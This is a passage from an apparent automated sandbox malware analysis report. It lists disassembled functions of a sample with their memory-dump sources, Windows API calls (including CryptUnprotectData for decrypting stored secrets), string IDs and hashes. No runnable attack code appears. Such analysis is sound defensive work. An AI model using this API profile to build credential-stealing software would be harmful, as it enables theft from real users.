                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /Mz=$H0=~$pzw~$V
                            • API String ID: 0-2595791368
                            • Opcode ID: 589b8f1234094e8552a2a14841b8df06779cd5a9f1a78def43ab78ba4c85fda4
                            • Instruction ID: 10a16b26ebf16f156d1f276ef54473b88d1f9471030d63da96bfb8996334ea7c
                            • Opcode Fuzzy Hash: 589b8f1234094e8552a2a14841b8df06779cd5a9f1a78def43ab78ba4c85fda4
                            • Instruction Fuzzy Hash: 3CB2D3F36086009FE3046E2DEC8567ABBE9EF94720F1A493DEAC4C7744E63598458793
                            Function 003C8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,003B5184,40000001,00000000,00000000,?,003B5184), ref: 003C8EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 5df83ece443cdcf1ba8012e2d24e82cac3a8121cc01b4af6f2a0b78490204729
                            • Instruction ID: 45874cb25dfa6948ca599de24d5eb8488e7d7696a26d1e11297adf3d7869b699
                            • Opcode Fuzzy Hash: 5df83ece443cdcf1ba8012e2d24e82cac3a8121cc01b4af6f2a0b78490204729
                            • Instruction Fuzzy Hash: 9D11F2B0200208AFDB01CF64E884FAA37A9AF89354F10945CF919CB250DB75EE41EB61
                            Function 003C7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0108E398,00000000,?,003D0E10,00000000,?,00000000,00000000), ref: 003C7A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C7A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0108E398,00000000,?,003D0E10,00000000,?,00000000,00000000,?), ref: 003C7A7D
                            • wsprintfA.USER32 ref: 003C7AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 01f959b6c8faf8de0bf67fbf4225dc58baf8eb8aded2842216fe98908545cae4
                            • Instruction ID: 26909fb9923104ca2eae302bf0679f1fb2c6c100bfc5999f162ecff1e5d280c1
                            • Opcode Fuzzy Hash: 01f959b6c8faf8de0bf67fbf4225dc58baf8eb8aded2842216fe98908545cae4
                            • Instruction Fuzzy Hash: DB115EB1D45218EBEB209B54DC49FA9B778FB04761F10439AE91AD32C0D7785E44CF52
                            Function 003C3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(003CE118,00000000,00000001,003CE108,00000000), ref: 003C3758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003C37B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 3da090dcc2a5c4891ee76d4571ba96fafe6db74090e05c86fdfc43367d9b56cc
                            • Instruction ID: ab1bf2922a741208f6d4d9f76612c8c670de9a1100800aebc8b02b5e5642e6a0
                            • Opcode Fuzzy Hash: 3da090dcc2a5c4891ee76d4571ba96fafe6db74090e05c86fdfc43367d9b56cc
                            • Instruction Fuzzy Hash: 6341E870A40A289FDB24DB58CC95F9BB7B5BB48702F4081D8E609EB2D0D7716E85CF50
                            Function 003B9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B9B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 003B9BA3
                            • LocalFree.KERNEL32(?), ref: 003B9BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 31d4c5ae181dcd8a9185cce1ebe8b668761037313d3081ef96f01a9a08d3ed29
                            • Instruction ID: ac1900e053dad25d11a411a7534562a26dde0c2cd9aea49040ab5302a07af5d6
                            • Opcode Fuzzy Hash: 31d4c5ae181dcd8a9185cce1ebe8b668761037313d3081ef96f01a9a08d3ed29
                            • Instruction Fuzzy Hash: 0D11FAB4A00209DFDB04DFA4D985AAE77B5FF88300F104559E91597350D774AE14CF62
                            Function 00774A97 Relevance: 4.0, Strings: 2, Instructions: 1503COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: VO}$e^\
                            • API String ID: 0-920810836
                            • Opcode ID: af17d5128f67cacc82b4b925829b1deecb360c621ce780800163eb0362aac5d0
                            • Instruction ID: ac603e0885a0f53d2fcd4bbad45e6611999c52c850a4e78d6067ec594331bc3c
                            • Opcode Fuzzy Hash: af17d5128f67cacc82b4b925829b1deecb360c621ce780800163eb0362aac5d0
                            • Instruction Fuzzy Hash: AEA2C2F3A0C6049FE704AE29EC8577AFBE5EF94320F16493DEAC583740E63558148A97
                            Function 006E3E43 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (^r$(^r$\>]
                            • API String ID: 0-4038120701
                            • Opcode ID: 0efd409c2623d495d3b02bfb3760742ec10ce0a74daded5bc25857b5fd743ad7
                            • Instruction ID: 7feef52345e92feba3c7dce42c1c17d23d3781d55ea4ae8725cccd1764426742
                            • Opcode Fuzzy Hash: 0efd409c2623d495d3b02bfb3760742ec10ce0a74daded5bc25857b5fd743ad7
                            • Instruction Fuzzy Hash: 12718AF3E086145FE3106E29DC8476ABBD6EFD4720F1A853ED9C893784E938590586D2
                            Function 00889BA9 Relevance: 1.6, Strings: 1, Instructions: 375COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: i1;Y
                            • API String ID: 0-1824976474
                            • Opcode ID: e2a41fc50830354304e2f4a6285e98d922513e8ec30e4b6cf5de969ec38f0136
                            • Instruction ID: 1f69db382a879fe02325e8920757adf2456649a28ac831477149ca001a0be4c2
                            • Opcode Fuzzy Hash: e2a41fc50830354304e2f4a6285e98d922513e8ec30e4b6cf5de969ec38f0136
                            • Instruction Fuzzy Hash: 00C1BEF3A082049FE7085E2CEC817B7B7D5EB94310F29853DEA85D3784F97A58048785
                            Function 0073AFF0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: FD~^
                            • API String ID: 0-3586643306
                            • Opcode ID: 904428389c531fda41183f01fc096512fb4e709fa4d43c59b4a3ee45d7bbb6cd
                            • Instruction ID: df8ecff7287ed2ae5686b4925b0938c01f9e7f2f9e820ece168ee65605174474
                            • Opcode Fuzzy Hash: 904428389c531fda41183f01fc096512fb4e709fa4d43c59b4a3ee45d7bbb6cd
                            • Instruction Fuzzy Hash: D24105F7F192004BE3049A3DED8472A76DBDBD4721F2F853DE688D3788E93998054256
                            Function 0077DA30 Relevance: .8, Instructions: 803COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3ac1acd102884eaf76af241c5a704e129f6e3fb59d579151c2994f4b7ada652a
                            • Instruction ID: a2437bc05374e58d82a9d779a48b889e29b840b322a1274031db1c79c711673b
                            • Opcode Fuzzy Hash: 3ac1acd102884eaf76af241c5a704e129f6e3fb59d579151c2994f4b7ada652a
                            • Instruction Fuzzy Hash: 233228F360C2109FE7046E2DEC8567ABBE9EFD8660F1A4A3DEAC4C3744E53548418796
                            Function 006DB053 Relevance: .2, Instructions: 224COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fb00ff3772828caf20c293c7b20293cd031bff1179a5e2fa0445c0bfc3090207
                            • Instruction ID: 227fa8a4eeb9d18969d966ee2439d39c65bac4018e2602526f7f4e8912da7074
                            • Opcode Fuzzy Hash: fb00ff3772828caf20c293c7b20293cd031bff1179a5e2fa0445c0bfc3090207
                            • Instruction Fuzzy Hash: D26114F3A487085BF3086E29EC86776B7D5EB94720F1A063DE689D73C4F9795801824A
                            Function 006834CB Relevance: .2, Instructions: 183COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b06ca14047dea56fd4a47f9de372a9935495618507e89b7fc11ba0e813604e19
                            • Instruction ID: 7abbe65524e224defa845bf1294fe6fc75d51f030672d6aa321290b8a1c9e4a8
                            • Opcode Fuzzy Hash: b06ca14047dea56fd4a47f9de372a9935495618507e89b7fc11ba0e813604e19
                            • Instruction Fuzzy Hash: 695118F36085005BF348E92ADC56BBAB7DBDBD8320F1AC53DE695C7788D93498018296
                            Function 0066D624 Relevance: .2, Instructions: 177COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
